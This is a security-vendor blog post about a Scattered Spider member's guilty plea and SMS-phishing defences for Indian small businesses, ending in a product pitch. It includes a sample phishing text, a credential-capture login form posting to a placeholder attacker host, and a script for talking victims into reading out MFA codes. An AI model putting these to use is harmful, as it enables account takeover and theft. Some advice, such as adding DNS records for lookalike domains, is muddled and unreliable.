Scattered Spider's 'Tylerb' Guilty: What Indian SMBs Must Learn

Originally reported by Krebs on Security

In April 2026, Tyler Robert Buchanan, a 24-year-old British national and senior member of the notorious Scattered Spider cybercrime group, pleaded guilty to wire fraud conspiracy and aggravated identity theft. This wasn't a minor breach. Buchanan's role in a coordinated campaign of text-message phishing attacks in summer 2022 led to the compromise of at least a dozen major technology companies—and the theft of tens of millions of dollars in cryptocurrency from investors.

When I was architecting security for Fortune 500 companies, I saw how sophisticated threat actors exploit the weakest link: human trust. Scattered Spider perfected this art. But here's what kept me up at night then, and what drives my work at Bachao.AI now: if this can happen to tech giants with security teams of hundreds, what about Indian SMBs operating with lean security budgets?

Let me walk you through what happened, why it matters to you, and exactly what you need to do about it.

What Happened

Scattered Spider isn't your typical ransomware gang. They're a social engineering collective—masters of psychological manipulation combined with technical precision. In summer 2022, they launched a series of carefully crafted SMS phishing campaigns targeting employees at major technology and cryptocurrency companies.

The attacks were disturbingly simple in concept but devastatingly effective in execution:

1. Initial reconnaissance: Scattered Spider identified high-value targets—employees at companies holding significant cryptocurrency assets or with access to sensitive systems.

1. SMS phishing at scale: They sent thousands of text messages impersonating IT support, HR teams, or security departments. The messages looked legitimate, created urgency ("Your account will be locked in 2 hours"), and directed recipients to fake login pages.

1. Credential harvesting: When employees entered their credentials on these fake pages, Scattered Spider captured them in real-time.

1. Multi-factor authentication bypass: Here's where it got clever—they used the stolen credentials to attempt login, triggering legitimate MFA prompts on the victim's actual phone. They then called the employee directly, claiming to be from IT, and social engineered them into reading back the MFA code.

1. Account takeover and lateral movement: Once inside, they moved laterally through networks, escalating privileges and accessing cryptocurrency wallets, investor funds, and sensitive intellectual property.

Why This Matters for Indian Businesses

You might think: "This happened to tech giants. We're a mid-sized software company / e-commerce startup / fintech firm in India. Why should we worry?"

Here's the uncomfortable truth: Scattered Spider's playbook is now public, and threat actors worldwide are copying it.

As someone who's reviewed hundreds of Indian SMB security postures, I can tell you that most of you are running on the same infrastructure that was vulnerable in 2022:

1. Weak SMS-based authentication: Many Indian businesses still rely on SMS OTP as their primary MFA method. Scattered Spider proved this is bypassable through social engineering.

1. Minimal security awareness training: Most Indian SMBs don't conduct regular phishing simulations or employee awareness programs. Scattered Spider's success hinged on human error—not technical exploits.

1. Lack of detection mechanisms: If you don't have SIEM (Security Information and Event Management) or behavioral monitoring, you won't detect when an attacker is moving laterally through your network. Tech giants took weeks to notice.

1. Regulatory exposure: Under the Digital Personal Data Protection (DPDP) Act 2023, you're required to implement reasonable security measures and notify CERT-In of breaches within 6 hours. A Scattered Spider-style attack could expose you to penalties of up to ₹250 crores.

1. Cryptocurrency and fintech targets: If you operate in India's booming crypto, fintech, or payment sectors, you're a direct target. Scattered Spider specifically hunted companies with access to financial assets.

Technical Breakdown: How Scattered Spider Operated

Let me map out the attack flow so you understand exactly where defenses should have stopped them:

graph TD
    A["📱 SMS Phishing Campaign"] -->|Targets employees| B["👤 Social Engineering"]
    B -->|Fake IT support call| C["🔐 Credential Harvesting"]
    C -->|Username + Password captured| D["📲 MFA Bypass via Social Eng"]
    D -->|Employee reads back OTP| E["✅ Account Takeover"]
    E -->|Lateral movement begins| F["🔑 Privilege Escalation"]
    F -->|Access to crypto wallets| G["💰 Data Exfiltration & Theft"]
    G -->|Funds transferred| H["🚨 Breach Detected Too Late"]

The SMS Phishing Message

Here's what a typical Scattered Spider SMS looked like (reconstructed from breach reports):

Hi John, 
Your account will be locked in 2 hours due to unusual activity. 
Verify now: hxxps://okta-verify-secure.com/login
— IT Security Team

Notice the elements:

1. Urgency (2-hour deadline)
2. Authority (IT Security Team)
3. Legitimacy (looks like a real Okta login URL, with typo: okta-verify-secure.com instead of okta.com)
4. Action (click the link)

The Fake Login Page

They hosted a pixel-perfect replica of the target company's login page:

<!-- Simplified example of what they created -->
<form action="https://attacker-server.com/capture" method="POST">
    <input type="email" name="username" placeholder="Email" required>
    <input type="password" name="password" placeholder="Password" required>
    <button type="submit">Verify Account</button>
</form>

When an employee submitted this form, their credentials went directly to the attacker's server, not to the legitimate company.

The MFA Bypass

Once they had credentials, they attempted login on the real system. When prompted for MFA, they called the employee:

Attacker: "Hi John, this is IT Security. We detected a login attempt on your account. 
Can you read me the 6-digit code on your authenticator app?"

Employee (trusting): "Sure, it's 847392."

Attacker: "Thanks, that confirms it's really you. You're all set."

Result: Attacker now has username + password + current MFA code. They log in while the employee is still on the call, and the employee never realizes they've been compromised.

How to Protect Your Business

Let me give you a practical, layered defense strategy:

Quick Fixes You Can Implement Today

1. Enable conditional access policies (if you use Microsoft Azure AD):

# Block login attempts from unusual locations
# Require MFA for all users
# Enforce password complexity

# In Azure AD > Conditional Access > New Policy:
# Condition: User risk = High
# Grant: Require MFA + Change password

2. Set up DNS-based phishing detection:

# Add these DNS records to catch typosquatting domains
# (similar to what Scattered Spider used)

# For okta.com, add monitoring for:
okta-verify.com
okta-security.com
okta-verify-secure.com
okta-login-secure.com

# Use a service like DomainTools or SecurityTrails to monitor

3. Implement a phishing reporting button in email:

# If using Microsoft Outlook:
# Enable "Report Message" add-in
# Train all staff: "See something phishing? Click Report Message."
# Review reports weekly and adjust email filters accordingly

4. Audit your MFA setup:

# For Azure AD, check MFA registration:
Connect-MsolService
Get-MsolUser | Where-Object {$_.StrongAuthenticationMethods.Count -eq 0} | Select UserPrincipalName

# This shows users WITHOUT MFA enabled
# Result: Fix these immediately

How Bachao.AI Detects This Attack Vector

When I founded Bachao.AI, this exact scenario—social engineering + weak MFA + undetected lateral movement—was the pattern I saw repeatedly in Indian SMBs. Here's how we've built protections into our platform:

Real Example: How We'd Catch This Attack

Imagine a Bachao.AI customer receives a Scattered Spider SMS phishing attack:

1. Our Security Training module flags the phishing URL as suspicious (it's not on the company's whitelist of legitimate domains).

1. Our VAPT scan (run quarterly) would have already identified that the customer's MFA setup relies on SMS OTP—a known weakness—and recommended hardware keys.

1. If an employee fell for it, our Dark Web Monitoring would detect the leaked credentials within hours and alert the company to reset that user's password.

1. If lateral movement began, a customer with our Incident Response service would have 24/7 monitoring to catch unusual network traffic (e.g., accessing crypto wallets from a new device).

1. When breach is detected, we handle the CERT-In notification and DPDP Act compliance reporting—no guessing about India's 6-hour deadline.

What You Should Do Right Now

Today:

1. [ ] Audit your MFA setup. Are you using SMS OTP or authenticator apps? (Hardware keys are best.)
2. [ ] Check if your employees have received phishing training in the last 6 months. If not, start immediately.
3. [ ] Review your incident response plan. Do you have a 24/7 breach hotline? Do you know how to notify CERT-In?

1. [ ] Run a phishing simulation. Send 10% of your staff a fake phishing email. See who clicks. (This is how Scattered Spider identified targets.)
2. [ ] Implement conditional access policies to block logins from unusual locations.
3. [ ] Enable email security filtering to catch typosquatting domains.

1. [ ] Conduct a VAPT scan to identify weaknesses in your authentication and access controls.
2. [ ] Set up Dark Web Monitoring to track if your employees' credentials appear in breach databases.
3. [ ] Document your incident response procedures and share them with your team.

The Bigger Picture

Scattered Spider's success wasn't due to a zero-day exploit or advanced malware. It was due to human trust combined with weak authentication and poor detection.

The good news? These are all fixable problems. You don't need a security team of hundreds. You need:

1. Awareness: Train your people to spot phishing.
2. Authentication: Make it hard to bypass (hardware keys > authenticator apps > SMS OTP).
3. Detection: Monitor for unusual activity (lateral movement, credential access, data exfiltration).
4. Response: Have a plan to act fast when something goes wrong.

Book Your Free VAPT Scan → We'll identify your vulnerabilities in 24 hours and give you a roadmap to fix them.

Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.

Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.